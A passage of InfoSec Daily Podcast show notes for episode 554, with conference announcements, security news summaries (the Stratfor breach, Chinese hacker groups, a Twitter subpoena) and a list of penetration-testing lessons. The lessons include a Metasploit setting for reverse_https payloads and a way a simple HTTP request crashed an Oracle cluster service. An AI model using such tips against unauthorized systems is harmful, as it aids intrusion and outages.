	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://mashable.com/2011/12/28/leaked-twitter-subpoena-raises-online-privacy-issues/
	The leaked subpoena sent to Twitter this month by the Suffolk District Attorney&#39;s Office in Boston is causing some hoopla on the web and raising the issue of law enforcement&#39;s access to online personal data. On Dec. 14, the D.A.&#39;s Office issued a subpoena to Twitter in order to access the account information of two users who tweeted a list of personal information they allegedly obtained by hacking into the Boston Police Patrolmens&#39; Association. The hackers stole identifying information and Tweeted it to followers. The subpoena requests &#34;available subscriber information, for the account or accounts associated with the following information, including IP address logs for account creation.&#34;
	In the subpoena, assistant D.A. Benjamin A. Goldberger requests that the investigation be kept from the Twitter users as to not impede the ongoing probe. But the information was leaked. We reached out to Twitter for comment, but have yet to hear back.
	On Dec. 23 one of the accounts under investigation, @p0isAn0N Tweeted, &#34;Haha. Boston PD submitted to Twitter for my information. Lololol? For what? Posting info pulled from public domains? #comeatmebro.&#34;
	The D.A.&#39;s office requested details of two Twitter users and also listed the name Guido Fawkes, which is the name but not handle listed for one of the accounts under investigation, as well as the hashtags #BostonPD and #d0xcak3.
	One of the accounts being probed is listed in the subpoena as @OccupyBoston, however that account appears to be inactive. It&#39;s likely they meant @Occupy_Boston, which Tweets about the occupy movement. Targeting this account has lead some to speculate that the police are monitoring the online activity of occupy protestors.
	Twitter&#39;s website contains an informat[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 554 &#8211; Pentesting Lessons, Twitter Suite, Hidden Dragon, Stratfor Again, Facebook 911, Cuckoo &amp; Boris’ Top 5</title>
		<link>http://www.isdpodcast.com/episode-554-pentesting-lessons-twitter-suite-hidden-dragon-stratfor-again-facebook-911-cuckoo-boris-top-5</link>
		<comments>http://www.isdpodcast.com/episode-554-pentesting-lessons-twitter-suite-hidden-dragon-stratfor-again-facebook-911-cuckoo-boris-top-5#comments</comments>
		<pubDate>Thu, 29 Dec 2011 02:21:32 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3309</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 554 for December 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 554 for December 28, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Pentest Lessons</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. &nbsp;Sending a web server check (GET / HTTP/1.0) can crash the Oracle cluster service (or at least it used to)</span><a href="https://twitter.com/#%21/sawaba"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@sawaba</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. &nbsp;You can specify a valid cert to be used with a reverse_https payload (requires cert+key in the same file): set SSLCert /path/to/cert.pem. &nbsp;</span><a href="https://twitter.com/#%21/hdmoore"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@hdmoore</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. &nbsp;Do not use a new tool or exploit on a customer&#39;s network without testing it in a controlled environment first.</span><a href="https://twitter.com/#%21/pentestlessons"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@pentestlessons</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. &nbsp;Patch and/or update your software (sploits, metasploit, nessus, etc.) before you go on-site. &nbsp;There is nothing worse that being on-site and not being able to update anything.</span><a href="https://twitter.com/#%21/b105h4ck3r"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">&nbsp;@b105h4ck3r</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5. Ensure you ask the customer whether they use sa accounts for their MSSQL servers, or if they have low threshold for lockouts before you even start scanning their networks. nmap -A and nessus default scans test the top 6 passwords, and if they have a lockout of 4, you probably just shut down all their database applications.</span><a href="http://www.twitter.com/krangarajan"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@krangarajan</span></a><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">6. &nbsp;If possible, get familiar with the networking equipment in use before running scans, as some may not be able to handle the most mundane, typical port scans! </span><a href="https://twitter.com/#%21/sawaba"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@sawaba</span></a></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In one case, I was scanning systems attached to an ancient HP switch, and overflowed the buffers. As a result, no one connected to the switch could access the Internet. All 6 feet, 7 inches of the CEO burst into the conference room and boomed, &quot;Who the fuck BROKE my INTERNET?&quot;.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&#39;m not sure if Checkpoint firewalls are still set up this way, but even a few years ago, they used to have a persistent &quot;Connection Table&quot; the firewalls I encountered had this table set to 40,000 connections. It would statefully track all these connections until they closed or timed out. The timeout value, if the connection was not cleanly closed was set to 2 hours. The problem was that, once the connection table was filled, it wouldn&#39;t allow any new connections, and would drop any new TCP connections. A typical NMap scan, scanning all 65535 ports on a single host located on the other side of this firewall, would fill up the table, and cause an outage for this company.</span></li>
</ul>
<p>
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theaustralian.com.au/media/writer-sued-over-twitter-account/story-e6frg996-1226231108293"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theaustralian.com.au/media/writer-sued-over-twitter-account/story-e6frg996-1226231108293</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A US website is trying to recoup US $340,000 from a former employee who made the company&#39;s Twitter presence a favoured haunt.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For the past four years technology writer Noah Kravitz worked for popular mobile phone site Phonedog.com. He maintained the Twitter account @Phonedog_Noah which over the period amassed 17,000 followers.</span></p>
<p>	<a href="http://www.nytimes.com/2011/12/26/technology/lawsuit-may-determine-who-owns-a-twitter-account.html?_r=1"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">The New York Times reports</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Phonedog.com is now suing Mr Kravitz for compensation, arguing the Twitter following is a customer list and that it is entitled to US$2.50 for each follower.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the newspaper, when the writer left the company in October 2010 it was agreed he could keep the Twitter account in return for occasionally tweeting links about the website.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, eight months later the company sued their former employee claiming that despite Mr Kravitz having changed his Twitter handle to @NoahKravitz it still retained ownership of the original 17,000 followers and deserved to be compensated.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In statement issued to NYT, Phonedog.com said: &ldquo;The costs and resources invested by PhoneDog Media into growing its followers, fans and general brand awareness through social media are substantial and are considered property of PhoneDog Media. We intend to aggressively protect our customer lists and confidential information, intellectual property, trademark and brands.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<a href="http://twitter.com/#%21/noahkravitz"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">noahkravitz</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Noah Kravitz</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you&#39;re going to unfollow me, don&#39;t do it to save me legal fees. Do it b/c you hate my 11 Most Important Gadgets of 2011 bit.ly/vTbXQt</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.theregister.co.uk/2011/12/24/china_cybercrime_underground_analysis/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/24/china_cybercrime_underground_analysis/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cybercrooks and patriotic state-backed hackers in China are collaborating to create an even more potent security threat, according to researchers.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Profit-motivated crooks are trading compromised access to foreign governments&#39; computers, which they are unable to monitise, for exploits with state-sponsored hackers. This trade is facilitated by information broker middlemen, according to Moustafa Mahmoud, president of The Middle East Tiger Team.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mahmoud has made an extensive study of the Chinese digital underground that partially draws on material not available to the general public, such as books published by the US Army&#39;s Foreign Military Studies Office, to compile a history of hacking in China. His work goes a long way to explain the threat of cyber-espionage from China that has bubbled up towards the top of the political agenda over recent months.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The first Chinese hacking group was founded in 1997 but disbanded in 2000 after a financial row between some of its principal players led to a lawsuit. At its peak the organisation had about 3,000 members, according to Mahmoud. The motives of this so-called Red Hacker group were patriotic, defending motherland China against its enemies.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hacking the US Embassy and the White House over the accidental bombing of the Chinese Embassy in Belgrade back in 1999 brought many flag-waving Chinese hackers together to, as they saw it, defend the honour of the motherland and fight imperialism in cyberspace.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This role was taken over by the Honker Union of China (HUC) after 2000, and the HUC later became the mainstay of the Red Hacker Alliance. China&rsquo;s so-called &ldquo;red hackers&rdquo; attack critics of the state and infiltrate foreign government and corporate sites &ndash; among other activities. The phenomenon of patriotic hackers is far from restricted to China and also exists in Russia, for example. Russian hackers tend to make greater use of defacement and botnets to silence critics rather than spying.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://news.xinhuanet.com/english/sci/2011-12/27/c_131329655.htm"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.xinhuanet.com/english/sci/2011-12/27/c_131329655.htm</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stratfor, a global intelligence company, said some victims of a data breach may be targeted again for offering public support for the company after they speak out about the hacking, according to media reports on Tuesday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">U.S.-based Stratfor, provides independent analysis of international affairs and security threats and describes itself as a publisher of geopolitical analysis.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It charges subscribers for its reports and analysis, delivered through the web, emails and videos.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stratfor said on its Facebook page that its affected clients and its supporters &quot;are at risk of having sensitive information repeatedly published on other websites.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the Associated Press, the hacking movement &quot;Anonymous&quot; claimed Sunday through Twitter that it had stolen thousands of credit card numbers and other personal information belonging to the company&#39;s clients.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Stratfor spokesman said several law enforcement agencies are investigating the incident but would not say whether the information was encrypted in its database.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The data was posted in a series of releases in links embedded in online messages that, in turn, were linked to Twitter.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Some of the files appeared to be alphabetical listings of Stratfor clients with related credit card information.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The amount posted suggests that information about more than 100,000 individuals and thousands of companies was exposed, according to the AP report.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcworld.com/article/247044/facebook_post_saves_woman_from_hostage_situation.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcworld.com/article/247044/facebook_post_saves_woman_from_hostage_situation.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Utah woman and her 17-month-old son were rescued from a residence after she posted a desperate status update on Facebook.</span><br />
